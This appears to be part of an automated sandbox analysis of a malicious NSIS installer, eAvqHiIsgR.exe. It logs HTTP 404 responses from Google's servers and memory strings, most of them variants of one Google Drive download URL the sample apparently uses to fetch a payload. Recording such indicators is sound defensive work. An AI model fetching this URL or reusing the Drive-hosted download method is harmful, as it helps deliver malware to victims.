AFiumC79xWUsHjucgOk9UYtEHnk-RcE_R5talxm5kmIUI3Nf1EiFH68-PN-ploq9UEiJ_7unKy2t-kMoxgServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 16:26:47 GMTContent-Security-Policy: script-src 'nonce-HSHo8qZeZwI-myifIfl6-w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652X-GUploader-UploadID: AFiumC73LT_8RIbikhZ7aMiadkkYH_dbkzfuvlksbtgts_h_5wRkMowMV1a1kz-E6f8m-KirCUt8UG8o1wServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 16:26:53 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-j7fetvVzqsPu9BS6yq2COg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originContent-Length: 1652X-GUploader-UploadID: AFiumC6_3xX-Gvc5Btci_WjemGG-N6XqsJTeKUEdMi-CBxaFvhoN_sr15Cp3jiaOs_R-lmgTQHBxrc0dUgServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 16:26:58 GMTContent-Security-Policy: script-src 'nonce-AwDv4fGpx1CodjAZxGju-Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652X-GUploader-UploadID: AFiumC7lRDRY4LukXcieZVLZlEzHLEMOXx6s-vItBjhAUiSaRMO69b6s11pT1M4_d4axgBkRCYcW_P7rnAServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 16:27:04 GMTContent-Security-Policy: script-src 'nonce-yB9yYCz8zb4cXKMSspmcuQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652X-GUploader-UploadID: AFiumC4hHvH6RYzte-I48Xq0kC0xqUmDeVx-Pd46JFd10TRsgzJJ_UU3rOuX2e9hMfqCFNHEvLb0fqwJdQServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: eAvqHiIsgR.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
      Source: eAvqHiIsgR.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: eAvqHiIsgR.exe, 00000005.00000001.3014050389.0000000000649000.00000008.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.ftp.ftp://ftp.gopher.
      Source: eAvqHiIsgR.exe, 00000005.00000001.3014050389.00000000005F2000.00000008.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
      Source: eAvqHiIsgR.exe, 00000005.00000001.3014050389.00000000005F2000.00000008.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
      Source: eAvqHiIsgR.exe, 00000005.00000003.3587862634.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3389388018.0000000003461000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
      Source: eAvqHiIsgR.exe, 00000005.00000003.3333159540.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3191224498.0000000003448000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3219868848.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3277143774.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3219868848.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3389388018.0000000003446000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3191224498.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3304104824.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3504923023.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3360279135.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3277143774.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000002.4523418528.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3475549331.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3389388018.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000002.4523418528.00000000033F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
      Source: eAvqHiIsgR.exe, 00000005.00000003.3504923023.0000000003461000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/G
      Source: eAvqHiIsgR.exe, 00000005.00000002.4523418528.00000000033F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/Pbw
      Source: eAvqHiIsgR.exe, 00000005.00000003.3333159540.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3191224498.0000000003448000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3219868848.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3389388018.0000000003446000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3304104824.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3360279135.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3277143774.0000000003447000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/a
      Source: eAvqHiIsgR.exe, 00000005.00000003.3333159540.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3389388018.0000000003446000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3304104824.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3504923023.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3360279135.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3277143774.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3475549331.0000000003447000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/ertificates
      Source: eAvqHiIsgR.exe, 00000005.00000002.4523418528.0000000003433000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3389388018.0000000003446000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3504923023.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3475549331.0000000003447000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/pQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download
      Source: eAvqHiIsgR.exe, 00000005.00000002.4523418528.0000000003433000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3504923023.0000000003447000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/pQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download$Ny
      Source: eAvqHiIsgR.exe, 00000005.00000003.3504923023.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3475549331.0000000003447000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/pQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download1
      Source: eAvqHiIsgR.exe, 00000005.00000002.4523418528.0000000003433000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/pQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=downloade
      Source: eAvqHiIsgR.exe, 00000005.00000003.3333159540.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3219868848.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3389388018.0000000003446000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3304104824.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3504923023.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3360279135.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3277143774.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3475549331.0000000003447000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/pQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=downloadszN
      Source: eAvqHiIsgR.exe, 00000005.00000002.4523418528.0000000003433000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/pQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=downloadt
      Source: eAvqHiIsgR.exe, 00000005.00000003.3333159540.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3219868848.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3360279135.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3389388018.0000000003461000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/r
      Source: eAvqHiIsgR.exe, 00000005.00000002.4542923885.0000000032A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ
      Source: eAvqHiIsgR.exe, 00000005.00000002.4523418528.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000002.4521588068.000000000019B000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69
      Source: eAvqHiIsgR.exe, 00000005.00000003.3333159540.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3304104824.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3277143774.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3219868848.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3475549331.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3191224498.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3504923023.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3360279135.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3389388018.0000000003461000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69%9
      Source: eAvqHiIsgR.exe, 00000005.00000003.3304104824.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3277143774.0000000003461000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM690
      Source: eAvqHiIsgR.exe, 00000005.00000002.4523418528.00000000033F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM693J
      Source: eAvqHiIsgR.exe, 00000005.00000002.4523418528.00000000033F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69F
      Source: eAvqHiIsgR.exe, 00000005.00000003.3333159540.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3304104824.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3277143774.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3219868848.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3475549331.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3191224498.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3360279135.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3389388018.0000000003461000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69KL?
      Source: eAvqHiIsgR.exe, 00000005.00000003.3333159540.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3277143774.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3219868848.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3475549331.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3504923023.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000002.4523418528.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3360279135.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3389388018.0000000003461000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69Nk
      Source: eAvqHiIsgR.exe, 00000005.00000003.3304104824.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3277143774.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3219868848.0000000003461000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69ib2
      Source: eAvqHiIsgR.exe, 00000005.00000003.3475549331.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3504923023.0000000003461000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69s
      Source: eAvqHiIsgR.exe, 00000005.00000002.4523418528.0000000003433000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.comZT
      Source: eAvqHiIsgR.exe, 00000005.00000002.4523418528.0000000003433000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3333159540.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3304104824.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3277143774.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3219868848.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3475549331.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3191224498.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3504923023.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000002.4523418528.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3360279135.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3389388018.0000000003461000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
      Source: eAvqHiIsgR.exe, 00000005.00000002.4523418528.0000000003433000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/A
      Source: eAvqHiIsgR.exe, 00000005.00000003.3333159540.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3304104824.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3277143774.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3219868848.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3475549331.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3191224498.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3504923023.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000002.4523418528.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3360279135.0000000003461000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3389388018.0000000003461000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/I
      Source: eAvqHiIsgR.exe, 00000005.00000002.4523418528.0000000003433000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/J
      Source: eAvqHiIsgR.exe, 00000005.00000002.4523418528.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3698690787.00000000034A1000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3784646327.00000000034A4000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3812944519.00000000034A1000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3475549331.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3587862634.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000002.4523418528.00000000033F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download
      Source: eAvqHiIsgR.exe, 00000005.00000003.3333159540.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3389388018.0000000003446000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3304104824.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3360279135.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3277143774.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3475549331.0000000003447000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download$N
      Source: eAvqHiIsgR.exe, 00000005.00000002.4523418528.0000000003433000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3333159540.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3389388018.0000000003446000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3304104824.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3360279135.0000000003447000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download1
      Source: eAvqHiIsgR.exe, 00000005.00000003.3304104824.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3475549331.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3191224498.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3389388018.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3360279135.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3504923023.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3277143774.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3219868848.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000002.4523418528.000000000344F000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3333159540.000000000344F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=downloadFb
      Source: eAvqHiIsgR.exe, 00000005.00000002.4523418528.0000000003433000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3333159540.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3191224498.0000000003448000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3219868848.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3389388018.0000000003446000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3304104824.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3504923023.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3360279135.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3277143774.0000000003447000.00000004.00000020.00020000.00000000.sdmp, eAvqHiIsgR.exe, 00000005.00000003.3475549331.0000000003447000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=downloadJb
